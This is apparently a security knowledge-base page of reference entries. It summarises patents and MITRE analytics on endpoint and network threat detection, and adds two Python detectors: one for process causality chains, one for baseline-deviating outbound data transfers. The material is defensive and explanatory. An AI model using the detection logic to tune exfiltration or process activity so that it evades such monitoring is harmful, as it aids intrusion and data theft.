  • "A system is used for detection of advanced persistent and non-persistent threats in a computerized environment. The system is connected to a plurality of user devices coupled to an enterprise's network. The system receives via an interface an electronic notification of at least one event in the operating system of the computer. The system then analyzes the at least one event. The system then generates a causality chain for the at least one event respective of the analysis. The causality chain comprises all the threads that attributed to the at least one event in a chronological order. The system then identifies a main thread that started the causality chain that led to the at least one event. Then, the system determines whether the main thread is associated with malicious software. Upon determination that the main thread is associated with malicious software, the causality chain is marked as infected."

kb-author

  • "Gil BARAK"

kb-mitre-analysis

  • "The patent describes detecting malicious events on a host. For each new event (e.g. a new file request received from a user device, a change in an existing file in a container) a causality chain is developed for all threads associated with the event. The causality chain identifies the thread that started the process of the event (main thread). If a thread in the causality chain has no parent, i.e. no main thread associated with it, the process is identified as malicious."

kb-organization

  • "Palo Alto Networks Inc, Cyber Secdo Ltd"

rdfs:label

  • "Reference - System and methods thereof for detection of persistent threats in a computerized environment background - Palo Alto Networks Inc, Cyber Secdo Ltd"

kb-reference-title

  • "System and methods thereof for detection of persistent threats in a computerized environment background"

Usage (5)

kb-abstract

  • "A computerized method for identification of suspicious processes executing on an end-point device communicatively connected to a network, the network communicatively connected to a server, the method comprising receiving, by the server, a record of at least one process initiated by and executing on the end-point device. One or more parameters associated with the at least one process are identified. A first time pointer is identified corresponding to the identified one or more parameters. A second time pointer at which a user associated with the end-point device initiated a user dependent process is identified. Whether the second time pointer occurred before the first time pointer is identified. It is determined whether the at least one process was initiated by the user based on identification of user dependent processes and corresponding attribution. An action is performed based on the above determination."

kb-author

  • "Gil BARAK"

kb-mitre-analysis

  • "The patent describes detecting malicious processes by identifying the order of process initiation. The start of a user initiated process (user query, opening an application, etc.) is compared with the start of processes initiated by the device (e.g. during boot). In addition, a determination is made on whether processes were not initiated by a user by examining process parameters such as the type of process, its creator, source, etc. If it is determined that a user initiated process was started before a process initiated by the device and the process was not initiated by the user, the process is marked as suspicious."
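
The three Secdo analyses above describe the same machinery from different angles: build the causality chain back to the root (main) process, flag a chain whose root has no parent, attribute a chain to boot or to a user action, and treat a device-initiated process that appears after user activity began as suspect. The following added example (not Secdo's or Palo Alto Networks' code, not code from the page) applies all three rules to a constructed set of process-start events. The event shape, the `user_initiated` flag an agent would supply, the boot-root set and the logon timestamp are assumptions.

```python
from dataclasses import dataclass

BOOT_PIDS = {4}              # the System process on Windows (assumed root of boot-time chains)
FIRST_USER_LOGON = 60.0      # seconds after boot at which the interactive user logged on (constructed)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    name: str
    start: float                  # seconds since boot
    user_initiated: bool = False  # agent flag: launched by an interactive user action


# Constructed process-start events as an endpoint agent might report them.
SAMPLE_EVENTS = [
    ProcEvent(4, 0, "System", 0.0),
    ProcEvent(600, 4, "services.exe", 5.0),
    ProcEvent(900, 600, "svchost.exe", 7.0),
    ProcEvent(1200, 600, "explorer.exe", 65.0, user_initiated=True),
    ProcEvent(1500, 1200, "winword.exe", 120.0, user_initiated=True),
    ProcEvent(1600, 1500, "cmd.exe", 125.0),
    ProcEvent(1700, 1600, "powershell.exe", 126.0),
    ProcEvent(1900, 900, "taskhostw.exe", 200.0),      # service-spawned after logon, no user ancestor
    ProcEvent(2000, 1999, "update.exe", 300.0),        # parent never observed: no main thread
    ProcEvent(2100, 2000, "rundll32.exe", 301.0),
]


def build_index(events):
    return {e.pid: e for e in events}


def causality_chain(pid, index):
    """Walk ppid links back to the root; returns the chain in chronological order."""
    chain, seen = [], set()
    cur = index.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = index.get(cur.ppid)
    return list(reversed(chain))


def attribute(pid, index):
    """Attribute a process to boot or to a user action, or flag it."""
    chain = causality_chain(pid, index)
    root = chain[0]
    if root.pid not in BOOT_PIDS and root.ppid not in index:
        return "orphan"                      # chain has no main thread
    if any(e.user_initiated for e in chain):
        return "user"                        # a user action is upstream
    if index[pid].start >= FIRST_USER_LOGON:
        return "device-after-logon"          # device-initiated, yet later than user activity
    return "boot"


def suspicious(events):
    """Map pid -> verdict for every process that is not cleanly attributable."""
    index = build_index(events)
    verdicts = {e.pid: attribute(e.pid, index) for e in events}
    return {pid: v for pid, v in verdicts.items() if v not in ("boot", "user")}


if __name__ == "__main__":
    for pid, verdict in suspicious(SAMPLE_EVENTS).items():
        print(pid, verdict)
```

Two caveats a practitioner should keep: an "orphan" only means the agent never saw the parent start, which also happens when the agent itself started late or the parent exited before collection began, so the verdict needs the parent's start to be genuinely unobserved rather than merely absent from the current window; and "device-after-logon" is a weak signal on its own (scheduled tasks and service restarts look exactly like `taskhostw.exe` here), which is why the analysis pairs it with process parameters such as type, creator and source.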

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - System and methods thereof for identification of suspicious system processes - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "System and methods thereof for identification of suspicious system processes"

Usage (5)

kb-abstract

  • "A computerized method for logical identification of malicious threats across a plurality of end-point devices (EPD) communicatively connected by a network, comprising collecting over the network an identifier associated with each file of a plurality of files, wherein each file of the plurality of files is installed on at least one of the plurality of EPDs and wherein the identifier is the same for each like file of the plurality of files. Information associated with an identified subset of files is collected, wherein the information indicates at least a time at which the at least one file was installed on one or more of the plurality of EPDs and the way the at least one file spread within the network. The collected information is analyzed according to a set of predetermined computerized investigation rules. The analysis is used to determine whether at least a file of the identified subset files is a suspicious file."

kb-author

  • "Gil BARAK"

kb-mitre-analysis

  • "This patent describes detecting suspicious files using file metadata such as the prevalence of the file across the network, file installation times, and how the file spread within the network. The combination of these factors is used to compute a risk score for the file; if the score falls below a threshold, an alert is sent."

kb-organization

  • "Palo Alto Networks Inc, Cyber Secdo Ltd"

rdfs:label

  • "Reference - System and methods thereof for logical identification of malicious threats across a plurality of end-point devices (epd) communicatively connected by a network - Palo Alto Networks Inc, Cyber Secdo Ltd"

kb-reference-of

kb-reference-title

  • "System and methods thereof for logical identification of malicious threats across a plurality of end-point devices (epd) communicatively connected by a network"

Usage (5)

kb-abstract

  • "A computerized method for preventing ransomware from encrypting data elements stored in a memory of a computer-based system, the method comprising identifying at least one identifier for a data element, wherein the at least one identifier indicates at least a position of the data element within the memory. An optimal number of virtual traps is determined for the data element corresponding to the at least one identifier. An optimal position for each of the virtual traps is determined corresponding to the at least one identifier. The virtual traps are sent to the determined optimal position within the memory."

kb-author

  • "Gil BARAK"

kb-mitre-analysis

  • ""

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - System and methods thereof for preventing ransomware from encrypting data elements stored in a memory of a computer-based system - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "System and methods thereof for preventing ransomware from encrypting data elements stored in a memory of a computer-based system"

Usage (5)

kb-abstract

  • "Disclosed is an improved approach to implement a system and method for detecting insider threats, where models are constructed that are capable of defining what constitutes the normal behavior for any given host and quickly finding anomalous behaviors that could constitute a potential threat to an organization. The disclosed approach provides a way to identify abnormal data transfers within and external to an organization without the need for individual monitoring software on each host, by leveraging metadata that describe the data exchange patterns observed in the network."

kb-author

  • "Nicolas BEAUCHESNE; David Lopes Pegna"

kb-mitre-analysis

  • "Determination of anomalous data transfers is performed over a given time period. For example, a check of a pull vs. push data ratio can be established over a specific time period, e.g., over a three-hour period, over a one day period, over a one week period, etc.

    The system can also establish a baseline behavior for data exchange for each host in terms of pull vs. push data ratio for each resource contacted by the host.

    Network packet capture data is collected and metadata is extracted. Aggregate data push/pull information from the metadata is then analyzed for a given host versus specific client to server relationships. This technique can potentially catch lateral data transfers, and may have filtering on alerting logic to only raise alarms when external hosts receive large data transfers."
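
The analysis above reduces to a concrete computation: aggregate bytes pushed and pulled per host and per contacted resource inside a time window, keep a per-pair baseline of the push/pull ratio and volume over past windows, and alert when a window departs from it, with an option to raise alarms only for external peers. The following added example (not Vectra's code, not code from the page) does exactly that over constructed flow metadata: 24 hourly baseline windows of normal traffic, then a window containing a large push to the internal file server and a large push to a never-seen external address. The flow record shape, the 3-sigma rule, the floors on the deviation, and the absolute rule for unseen peers are assumptions.

```python
from collections import defaultdict
from statistics import mean, pstdev


def _constructed_flows():
    """Constructed flow metadata: (window, host, peer, bytes_sent, bytes_received, peer_is_external)."""
    flows = []
    for hour in range(24):                      # 24 hourly baseline windows
        jitter = 1 + (hour % 5) * 0.02
        flows.append((hour, "ws01", "fileserver01", int(50_000 * jitter), int(2_000_000 * jitter), False))
        flows.append((hour, "ws01", "saas.example.net", int(20_000 * jitter), int(500_000 * jitter), True))
    # Window 24: normal SaaS traffic plus two large outbound transfers.
    flows.append((24, "ws01", "fileserver01", 900_000_000, 1_500_000, False))   # lateral staging
    flows.append((24, "ws01", "saas.example.net", 21_000, 510_000, True))      # normal
    flows.append((24, "ws01", "203.0.113.10", 850_000_000, 12_000, True))      # push to never-seen external host
    return flows


def push_ratio(sent, received):
    total = sent + received
    return sent / total if total else 0.0


def window_stats(flows, window):
    """Aggregate bytes per (host, peer) inside one window -> [sent, received, external]."""
    agg = defaultdict(lambda: [0, 0, False])
    for w, host, peer, sent, received, external in flows:
        if w == window:
            a = agg[(host, peer)]
            a[0] += sent
            a[1] += received
            a[2] = external
    return agg


def build_baseline(flows, windows):
    """Per (host, peer): mean/stdev of push ratio and bytes sent over past windows."""
    series = defaultdict(lambda: {"ratio": [], "sent": []})
    for w in windows:
        for key, (sent, received, _) in window_stats(flows, w).items():
            series[key]["ratio"].append(push_ratio(sent, received))
            series[key]["sent"].append(sent)
    return {key: {"ratio_mean": mean(s["ratio"]), "ratio_sd": pstdev(s["ratio"]),
                  "sent_mean": mean(s["sent"]), "sent_sd": pstdev(s["sent"])}
            for key, s in series.items()}


def detect(flows, baseline, window, sd_factor=3.0, new_peer_min_bytes=100_000_000, external_only=True):
    """Alerts for (host, peer) pairs whose push behaviour in `window` departs from baseline."""
    alerts = []
    for (host, peer), (sent, received, external) in window_stats(flows, window).items():
        if external_only and not external:
            continue
        ratio = push_ratio(sent, received)
        b = baseline.get((host, peer))
        if b is None:
            # No history with this peer: fall back to an absolute push rule.
            if sent >= new_peer_min_bytes and ratio > 0.5:
                alerts.append({"host": host, "peer": peer, "sent": sent, "ratio": round(ratio, 4),
                               "reason": "large push to previously unseen peer"})
            continue
        # Floors keep a perfectly regular baseline (stdev 0) from flagging any change at all.
        ratio_limit = b["ratio_mean"] + sd_factor * max(b["ratio_sd"], 0.05)
        sent_limit = b["sent_mean"] + sd_factor * max(b["sent_sd"], 0.1 * b["sent_mean"])
        if ratio > ratio_limit and sent > sent_limit:
            alerts.append({"host": host, "peer": peer, "sent": sent, "ratio": round(ratio, 4),
                           "reason": "push ratio and volume above baseline"})
    return alerts


FLOWS = _constructed_flows()
BASELINE = build_baseline(FLOWS, range(24))

if __name__ == "__main__":
    for a in detect(FLOWS, BASELINE, 24, external_only=False):
        print(a)
```

With `external_only=True` only the push to 203.0.113.10 is reported, which is the "only raise alarms when external hosts receive large data transfers" filter from the analysis; switching it off also surfaces the internal staging transfer to the file server, the lateral movement the same technique can catch.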

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - System for detecting threats using scenario-based tracking of internal and external network traffic - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "System for detecting threats using scenario-based tracking of internal and external network traffic"

Usage (5)

kb-abstract

  • "A method and system for identifying insider threats within an organization is provided. The approach constructs an internal connectivity graph to identify communities of hosts/users, and checks for abnormal behavior relative to past behaviors."

kb-author

  • "David Lopes Pegna; Himanshu Mhatre; Oliver Brdiczka"

kb-mitre-analysis

  • "This patent describes techniques for detecting insider attacks. Network packet capture data is collected and stored for processing. Metadata is extracted for each communication session on the organization's network and includes information on source and destination host, destination port, number of connection attempts, size of data exchanged, and duration and time of the communication. The metadata is used to build a connectivity graph of the network and identify groups of similar hosts that exhibit similar behavior. For each group of similar behavior identified, a baseline behavior pattern profile is developed. Network activity for a host within a group that deviates over a threshold from the baseline behavior patterns is identified as suspicious and an alert is generated."

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - System for implementing threat detection using daily network traffic community outliers - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "System for implementing threat detection using daily network traffic community outliers"

Usage (5)

kb-abstract

  • "Disclosed is an approach to detect insider threats, by tracking unusual access activity for a specific user or computer with regard to accessing key assets over time. In this way, malicious activity and the different preparation phases of attacks can be identified."

kb-author

  • "Himanshu Mhatre; David Lopes Pegna; Oliver Brdiczka"

kb-mitre-analysis

  • "The patent describes an insider threat detection system that analyzes packets sent within a network to identify and isolate malicious behavior. Current network traffic is collected and developed into a baseline that establishes the amount of data sent and received between a specific asset and a host. Current data transfer values are then compared with the baseline to identify anomalies."

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - System for implementing threat detection using threat and risk assessment of asset-actor interactions - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "System for implementing threat detection using threat and risk assessment of asset-actor interactions"

Usage (5)

kb-abstract

  • "Techniques for detecting and/or handling target attacks in an enterprise's email channel are provided. The techniques include receiving aspects of an incoming email message addressed to a first email account holder, selecting a recipient interaction profile and/or a sender profile from a plurality of predetermined profiles stored in a memory based upon the received properties, determining a message trust rating associated with the incoming email message based upon the incoming email message and the selected recipient interaction profile and/or the sender profile; and generating an alert identifying the incoming email message as including a security risk based upon the determined message trust rating. The recipient interaction profile includes information associating the first email account holder and a plurality of email senders from whom email messages have previously been received for the first email account holder, and the sender profile includes information associating a sender of the incoming email message with characteristics determined from a plurality of email messages previously received from the sender."

kb-author

  • "Manoj Kumar Srivastava"

kb-mitre-analysis

  • "The patent describes using sender trust rating and sender MTA trust rating as an indicator of level of email security risk.

    ### Sender Reputation explanation
    This patent includes Sender Reputation because it describes sender trust rating being used as an indicator of the level of security risk and/or trust level associated with an email sender. The sender trust rating may be determined based on one or more of:

    * length of time sender has known the enterprise
    * number of recipients in the enterprise the sender interacts with
    * sender vs. enterprise originated message ratio
    * sender messages open vs. not-open ratio
    * number of emails received from this sender
    * number of emails replied for this sender
    * number of emails from this sender not opened
    * number of emails from this sender not opened that contain an attachment
    * number of emails from this sender not opened that contain a URL
    * number of emails sent to this sender
    * number of email replies received from this sender

    Based on the trust rating an alert is generated identifying the incoming email message as a security risk.

    ### Sender MTA Reputation explanation
    This patent includes Sender MTA Reputation because it describes sender MTA trust rating as an indicator of the level of security risk and/or trust level associated with a sender MTA. The trust rating may be determined based on one or more of:

    * length of time MTA has interacted with the enterprise
    * number of sender domains sending emails from the MTA
    * number of recipients in the enterprise the MTA sends emails to
    * number of emails received from this MTA
    * number of email replies received from this MTA

    Based on the trust rating an alert is generated identifying the incoming email message as a security risk."

kb-organization

  • "Graphus Inc"

rdfs:label

  • "Reference - Systems and methods for detecting and/or handling targeted attacks in the email channel - Graphus Inc"

kb-reference-of

kb-reference-title

  • "Systems and methods for detecting and/or handling targeted attacks in the email channel"

Usage (5)

kb-abstract

  • "The disclosed computer-implemented method for detecting credential theft may include (i) monitoring a secured computing system's credential store that may include at least one sensitive credential that may be used to facilitate authentication of a user that is attempting to access the secured computing system, (ii) gathering, while monitoring the credential store, primary evidence of an attempted theft of the sensitive credential from the credential store, (iii) gathering corroborating evidence of the attempted theft of the sensitive credential, and (iv) performing a security action in response to gathering the primary evidence and the corroborating evidence of the attempted theft. The primary evidence of the attempted theft of the sensitive credential may include evidence of any suspicious access of the sensitive credential from the credential store that occurs outside of a procedure of authenticating the user. Various other methods, systems, and computer-readable media are also disclosed."

kb-author

  • "Adam Glick; Brian Schlatter; Feng Li; Akshata Krishnamoorthy Rao"

kb-mitre-analysis

  • ""

kb-organization

  • "Symantec Corp"

rdfs:label

  • "Reference - Systems and methods for detecting credential theft - Symantec Corp"

kb-reference-of

kb-reference-title

  • "Systems and methods for detecting credential theft"

Usage (5)

rdfs:label

  • "Reference - TCG Trusted Attestation Protocol Use Cases for TPM Families 1.2 and 2.0 and DICE"

kb-reference-title

  • "TCG Trusted Attestation Protocol Use Cases for TPM Families 1.2 and 2.0 and DICE"

Usage (5)

kb-abstract

  • "System and method is disclosed for protecting client software running on a client computer from tampering using a secure server. Prior to or independent of executing the client software, the system integrates self-protection into the client software; removes functions from the client software for execution on the server; develops client software self-protection updates; and periodically distributes the updates. During execution of the client software, the system receives an initial request from the client computer for execution of the removed function; verifies the initial request; and cooperates with the client computer in execution of the client software if verification is successful. If verification is unsuccessful, the system can attempt to update the client software on the client computer; and require a new initial request. Client software can be updated on occurrence of a triggering event. Communications can be encrypted, and the encryption updated. Authenticating checksums can be used for verification."

kb-author

  • "Kevin Dale Morgan"

kb-mitre-analysis

  • ""

kb-organization

  • "ARXAN TECHNOLOGIES Inc"

rdfs:label

  • "Reference - Tamper proof mutating software - ARXAN TECHNOLOGIES Inc"

kb-reference-of

kb-reference-title

  • "Tamper proof mutating software"

Usage (5)

kb-author

  • "National Counterintelligence and Security Center"

rdfs:label

  • "Reference - Technical Specifications for Construction and Management of Sensitive Compartmented Information Facilities"

kb-reference-of

kb-reference-title

  • "Technical Specifications for Construction and Management of Sensitive Compartmented Information Facilities"

Usage (5)

kb-abstract

  • "Infinite DNS decoy trap resource to catch threats scanning for network resources to attack.

    In various embodiments, a name server transmits a canonical name as resolution to another canonical name. In operation, when a resource name is requested for resolution, a determination is made that the resource name corresponds to a trap resource name. A first canonical name is transmitted as resolution to the trap resource name. The first canonical name is requested for resolution, and a second canonical name is transmitted as resolution. By providing trap canonical names as resolutions to trap canonical names, unauthorized software making the resolution requests is kept occupied with requesting resolution of canonical name after canonical name, impeding the ability of the unauthorized software to traverse a network."

kb-author

  • "Ben McCarty, James Graham"

kb-mitre-analysis

  • "MITRE Analysis was not found."

kb-organization

  • "Verisign Inc"

rdfs:label

  • "Reference - Techniques for impeding and detecting network threats - Verisign Inc"

kb-reference-of

kb-reference-title

  • "Techniques for impeding and detecting network threats"

Usage (5)

kb-abstract

  • "Tenable Nessus® Network Monitor (NNM), a passive monitoring sensor, continuously discovers active assets on the network and assesses them for vulnerabilities. NNM is based on patented network discovery and vulnerability analysis technology that continuously monitors and profiles non-intrusively. It monitors IPv4, IPv6 and mixed network traffic at the packet layer to determine topology, services and vulnerabilities."

kb-organization

  • "Tenable"

rdfs:label

  • "Reference - Tenable Passive Network Monitoring"

kb-reference-of

kb-reference-title

  • "Tenable Passive Network Monitoring"

Usage (5)

kb-author

  • "Matt Weir, Sudhir Aggarwal, Michael Collins, Henry Stern"

rdfs:label

  • "Reference - Testing Metrics for Password Creation Policies by Attacking Large Sets of Revealed Passwords"

kb-reference-of

kb-reference-title

  • "Testing Metrics for Password Creation Policies by Attacking Large Sets of Revealed Passwords"

Usage (5)

kb-abstract

  • "This disclosure describes, in part, techniques for detecting security exploits associated with return-oriented programming. The techniques include determining that a retrieved count is indicative of malicious activity, such as return oriented programming. The count may be retrieved from a processor performance counter of prediction mismatches, the prediction mismatches resulting from comparisons of a call stack of a computing device and of a shadow call stack maintained by a processor of the computing device. The techniques further include performing at least one security response action in response to determining that the count indicates malicious activity."

kb-author

  • "Georg WICHERSKI"

kb-mitre-analysis

  • "This patent describes a technique for detecting shellcode security exploits. A call stack of a computing device is compared with a shadow call stack maintained by a processor of the computing device since a return oriented program may only be able to control or spoof the call stack and not the shadow call stack. Mismatches between the two are counted and if the number of mismatches exceeds a certain threshold it is an indication of malicious activity and a security response action is performed."

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Threat detection for return oriented programming - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Threat detection for return oriented programming"

Usage (5)

kb-abstract

  • "Embodiments of the present disclosure provide for improved capabilities in the detection of malware, where malware threats are detected through the accumulated identification of threat characteristics for targeted computer objects. Methods and systems include dynamic threat detection providing a first database that correlates a plurality of threat characteristics to a threat, wherein a presence of the plurality of the threat characteristics confirms a presence of the threat; detecting a change event in a computer run-time process; testing the change event for a presence of one or more of the plurality of characteristics upon detection of the change event; storing a detection of one of the plurality of characteristics in a second database that accumulates detected characteristics for the computer run-time process; and identifying the threat when each one of the plurality of characteristics appears in the second database."

kb-author

  • "Clifford Penton; Irene Michlin"

kb-mitre-analysis

  • ""

kb-organization

  • "Sophos Ltd"

rdfs:label

  • "Reference - Threat detection through the accumulated detection of threat characteristics - Sophos Ltd"

kb-reference-of

kb-reference-title

  • "Threat detection through the accumulated detection of threat characteristics"

Usage (5)

kb-organization

  • "IBM"

rdfs:label

  • "Reference - Tivoli Application Dependency Discovery Manager 7.3.0 - Dependencies between resources"

kb-reference-of

kb-reference-title

  • "Tivoli Application Dependency Discovery Manager 7.3.0 - Dependencies between resources"

Usage (5)

kb-article

  • "## Document Abstract
    This specification defines the Trusted Platform Module (TPM) a device that enables trust in computing platforms in general. It is broken into parts to make the role of each part clear. All parts are required in order to constitute a complete standard. For a complete definition of all requirements necessary to build a TPM, the designer will need to use the appropriate platform-specific specification to understand all of the requirements for a TPM in a specific application or make appropriate choices as an implementer. Those wishing to create a TPM need to be aware that this specification does not provide a complete picture of the options and commands necessary to implement a TPM. To implement a TPM the designer needs to refer to the relevant platform-specific specification to understand the options and settings required for a TPM in a specific type of platform or make appropriate choices as an implementer."

rdfs:label

  • "Reference - Trusted Attestation Protocol Use Cases"

kb-reference-title

  • "Trusted Attestation Protocol Use Cases"

Usage (5)

kb-abstract

  • "A method to identify a child process to a parent process in an operating system includes obtaining a token and login identifier from the operating system. The parent process creates a remote procedure call communications endpoint to communicate with the child process. Thereafter, a child process is spawned by the parent process. A child-initiated request to communicate with the parent process is then received by the parent process. In order to verify the identity of the child-initiated request, the parent process impersonates the child process and receives an identifier that identifies the requestor child process. The requestor process identifier and the spawned child identifier are compared. Based on the comparison, the parent process responds to the child-initiated request. In another embodiment, process identifiers are used by the parent process to verify the identity of a child process that requests communication with the parent process."

kb-author

  • "Kedarnath Atmaram Dubhashi, Jonathan D. Schwartz, Sambavi Muthukrishnan, Simon Skaria"

kb-mitre-analysis

  • "This patent describes a technique for detecting malicious processes that claim to be the child process of a legitimate parent process. During the spawning of a child process, a child process identifier is generated. The child process identifier is a unique identifier that can be used to identify a child process. The child process identifier is transmitted by the security system of the operating system to the parent process. The parent process keeps track of the child process identifier. When a new child-initiated communications request is received by the parent process, the parent process checks if the requesting child process identifier and the child process identifier that the parent process is tracking are the same. If the identifiers are not the same, the parent process refuses the request."

kb-organization

  • "Microsoft Technology Licensing LLC"

rdfs:label

  • "Reference - Trusted Communications With Child Processes - Microsoft Technology Licensing LLC"

kb-reference-title

  • "Trusted Communications With Child Processes"

Usage (5)

kb-abstract

  • "Bypassing user account control (UAC Bypass) is generally done by piggybacking on a system process that has auto-escalate privileges. This analytic looks to detect those cases as described by the open-source UACME tool."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-04-001: UAC Bypass - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-04-001: UAC Bypass"

Usage (5)

kb-abstract

  • "UAF is an OMG standard that assists in development of architectural descriptions in commercial industry firms, federal government agencies and defense organizations. UAF has a variety of use cases from Enterprise and Mission architecting, to System of Systems (SoS) and Cyber-physical Systems engineering, as well as being an enabler for Digital Transformation efforts and for Department of Defense Architecture Framework (DoDAF) and NATO Architecture Framework (NAF) modeling. Architectural Descriptions in UAF are aligned with ISO/IEC/IEEE 42010:2011, Systems and software engineering -- Architecture description."

kb-organization

  • "OMG"

rdfs:label

  • "Reference - Unified Architecture Framework (UAF)"

kb-reference-of

kb-reference-title

  • "Unified Architecture Framework (UAF)"

Usage (5)

kb-abstract

  • "In embodiments of the present invention, a framework for an extensible, file-based security system is described for determining an appropriate application, application environment, and/or access or security control measure based at least in part on a file's reputation. In response to the selection of a file, an application controller may be used to select a software application from two or more software applications to open the selected file, based at least in part on the selected file's reputation. If launched, a software application may be configured to open the file in an environment, such as a virtual machine, quarantined environment, and the like, that is appropriate for the file based at least in part on the reputation information. A software application may be a secure software application configured to manage secure files, or an insecure software application configured to manage insecure files. The selected file, and communications relating to the selected software application, may be managed according to the selected software application's secure or insecure configuration. Further, the selected software application may associate reputation information with all files that are modified and/or created by the selected software application, including at least in part, reputation information matching that of the selected file."

kb-author

  • "Andrew J. Thomas"

kb-mitre-analysis

  • "This patent describes received files being open in an environment such as a virtual machine or quarantined environment to associate file reputation information that determines if a file is a threat."

kb-organization

  • "Sophos Ltd"

rdfs:label

  • "Reference - Use of an application controller to monitor and control software file and application environments - Sophos Ltd"

kb-reference-of

kb-reference-title

  • "Use of an application controller to monitor and control software file and application environments"

Usage (5)

kb-abstract

  • "It is unlikely that event log data would be cleared during normal operations, and it is likely that malicious attackers may try to cover their tracks by clearing an event log. When an event log gets cleared, it is suspicious. Alerting when a "Clear Event Log" is generated could point to this intruder technique. Centrally collecting events has the added benefit of making it much harder for attackers to cover their tracks. Event Forwarding permits sources to forward multiple copies of a collected event to multiple collectors, thus enabling redundant event collection. Using a redundant event collection model can minimize the single point of failure risk."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2016-04-002: User Activity from Clearing Event Logs - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2016-04-002: User Activity from Clearing Event Logs"

Usage (5)

kb-abstract

  • "Spyware and malware remain a serious problem and Microsoft developed security services, Windows Defender and Windows Firewall, to combat this threat. In the event Windows Defender or Windows Firewall is turned off, administrators should correct the issue immediately to prevent the possibility of infection or further infection and investigate to determine if caused by crash or user manipulation."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2016-04-003: User Activity from Stopping Windows Defensive Services - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2016-04-003: User Activity from Stopping Windows Defensive Services"

Usage (5)

kb-abstract

  • "Most users use only one or two machines during the normal course of business. User accounts that log in to multiple machines, especially over a short period of time, may be compromised. Remote logins among multiple machines may be an indicator of Lateral Movement.

    Certain users will likely appear as being logged into several machines and may need to be "whitelisted." Such users would include network admins or user names that are common to many hosts."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-02-012: User Logged in to Multiple Hosts - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-02-012: User Logged in to Multiple Hosts"

Usage (5)

kb-abstract

  • "Monitoring logon and logoff events for hosts on the network is very important for situational awareness. This information can be used as an indicator of unusual activity as well as to corroborate activity seen elsewhere.

    Could be applied to a number of different types of monitoring depending on what information is desired. Some use cases include monitoring for all remote connections and building login timelines for users. Logon events are Windows Event Code 4624 for Windows Vista and above, 518 for pre-Vista. Logoff events are 4634 for Windows Vista and above, 538 for pre-Vista."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-10-001: User Login Activity Monitoring - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-10-001: User Login Activity Monitoring"

Usage (5)

kb-abstract

  • "Spanning Tree Protocol (STP) data is obtained via network switch (SNMP) queries to enhance identification of switch-to-switch links in Layer-2 mapping. In particular, by analyzing the STP data, ambiguity in determining switch uplink ports may be reduced. Specifically, the STP data can be used in conjunction with other topography data to provide Layer-2 connectivity for nodes on a network topology. Layer-2 address mapping tables are collected from a topology mapping, and STP data is collected, along with address translation (ARP) tables. Using this information, switches are identified using Layer-2 address tables. The STP data can be correlated by comparing data in switches, identifying switch ports directly connected to other switch ports, and eliminating direct switch-to-switch port connections from consideration for further Layer-2 node mappings."

kb-author

  • "Michael Jon Swan"

kb-organization

  • "SolarWinds Worldwide LLC"

rdfs:label

  • "Reference - Using spanning tree protocol (STP) to enhance layer-2 topology maps"

kb-reference-of

kb-reference-title

  • "Using spanning tree protocol (STP) to enhance layer-2 topology maps"

Usage (5)

kb-abstract

  • "Systems, apparatuses, and methods for implementing virtualized process isolation are disclosed. A system includes a kernel and multiple guest VMs executing on the system's processing hardware. Each guest VM includes a vShim layer for managing kernel accesses to user space and guest accesses to kernel space. The vShim layer also maintains a separate set of page tables from the kernel page tables. In one embodiment, data in the user space is encrypted and the kernel goes through the vShim layer to access user space data. When the kernel attempts to access a user space address, the kernel exits and the vShim layer is launched to process the request. If the kernel has permission to access the address, the vShim layer copies the data to a region in kernel space and then returns execution to the kernel."

kb-author

  • "David A. Kaplan"

kb-mitre-analysis

  • ""

kb-organization

  • "Advanced Micro Devices Inc"

rdfs:label

  • "Reference - Virtualized process isolation - Advanced Micro Devices Inc"

kb-reference-of

kb-reference-title

  • "Virtualized process isolation"

Usage (5)

kb-organization

  • "Distributed Management Task Force (DMTF)"

rdfs:label

  • "Reference - Web-Based Enterprise Management"

kb-reference-of

kb-reference-title

  • "Web-Based Enterprise Management"

Usage (5)

kb-abstract

  • "What is NX/XD feature ?
    How to check whether NX/XD is enabled ?
    How to enable or disable NX/XD?

    NX/XD is a hardware CPU feature which is provided in almost all the hardware. Some BIOSes have an advanced option for enabling or disabling it.
    NX stands for No eXecute and XD stands for eXecute Disable. Both are the same and are a technology used in processors to prevent execution of certain types of code."

kb-author

  • "Red Hat"

kb-mitre-analysis

  • ""

kb-organization

  • "Red Hat"

rdfs:label

  • "Reference - What is NX/XD feature?"

kb-reference-of

kb-reference-title

  • "What is NX/XD feature?"

Usage (5)

kb-organization

  • "Microsoft"

rdfs:label

  • "Reference - Windows Management Infrastructure (MI)"

kb-reference-of

kb-reference-title

  • "Windows Management Infrastructure"

Usage (5)

kb-organization

  • "Microsoft"

rdfs:label

  • "Reference - Windows Management Instrumentation (WMI)"

kb-reference-of

kb-reference-title

  • "Windows Management Instrumentation"

Usage (5)

kb-abstract

  • ""

kb-author

  • "MITRE"

